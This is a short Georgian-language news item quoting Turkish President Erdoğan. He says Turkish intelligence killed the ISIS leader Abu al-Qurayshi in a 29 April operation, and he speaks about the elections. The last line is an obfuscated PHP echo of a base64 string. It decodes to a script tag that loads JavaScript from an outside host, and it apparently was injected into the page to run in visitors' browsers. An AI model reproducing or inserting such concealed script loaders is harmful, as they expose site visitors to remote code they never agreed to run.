celsiusi
ავერსი საქკაბელი

თურქეთის დაზვერვამ სირიაში ე.წ. ისლამური სახელმწიფოს ლიდერი, აბუ ალ-ყურეიში გაანეიტრალა, – ამის შესახებ თურქეთის პრეზიდენტმა, რეჯეფ თაიფ ერდოღანმა თურქულ მედიასაშუალებებთან შეხვედრის დროს განაცხადა.

„ეროვნული სადაზვერვო ორგანიზაცია დიდი ხნის განმავლობაში ადევნებდა თვალყურს დაეშის ე.წ. ლიდერს, კოდური სახელით აბუ ჰუსეინ ალ-ყურეიშის. ამას აქ პირველად ვამბობ. ეს პირი განეიტრალდა სადაზვერვო ორგანიზაციის მიერ 29 აპრილს ჩატარებული ოპერაციის დროს“, – თქვა ერდოღანმა.

ჟურნალისტებთან ინტერვიუს დროს თურქეთის პრეზიდენტმა საპრეზიდენტო და საპარლამენტო არჩევნებზე ისაუბრა და აღნიშნა, რომ საზღვარგარეთ ხმის მიცემის პროცესი ისევე უსაფრთხოდ მიმდინარეობს, როგორც ეს თურქეთში ხდება.

„გამოკითხვაში ხელსაყრელ განწყობას ვხედავთ. წინ ლამაზი სურათი გველოდება როგორც საპრეზიდენტო არჩევნებთან, ისე სახალხო ალიანსთან დაკავშირებით“, – აღნიშნა ერდოღანმა.

322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");